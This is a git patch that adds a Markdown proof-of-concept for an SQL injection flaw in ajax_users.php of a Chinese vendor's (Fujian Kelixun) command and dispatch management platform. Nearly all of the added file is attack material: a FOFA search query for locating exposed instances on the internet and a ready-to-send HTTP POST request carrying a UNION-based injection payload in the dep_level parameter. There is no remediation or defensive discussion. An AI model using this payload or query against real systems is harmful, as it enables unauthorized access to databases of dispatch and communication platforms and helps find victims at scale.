From 2679e0784df18d349022b63a2197168db6983498 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 9 May 2024 09:03:53 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=A6=8F=E5=BB=BA=E7=A7=91=E7=AB=8B?=
 =?UTF-8?q?=E8=AE=AF=E9=80=9A=E4=BF=A1=E6=8C=87=E6=8C=A5=E8=B0=83=E5=BA=A6?=
 =?UTF-8?q?=E7=AE=A1=E7=90=86=E5=B9=B3=E5=8F=B0ajax=5Fusers.php=E5=AD=98?=
 =?UTF-8?q?=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...�信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100644 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md

diff --git a/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md b/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..7ce075c
--- /dev/null
+++ b/福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞.md
@@ -0,0 +1,16 @@
+## 福建科立讯通信指挥调度管理平台ajax_users.php存在SQL注入漏洞
+
+## fofa
+```
+body="app/structure/departments.php"||app="指挥调度管理平台"
+```
+
+## poc
+```
+POST /app/ext/ajax_users.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
+Content-Type: application/x-www-form-urlencoded
+ 
+dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
+```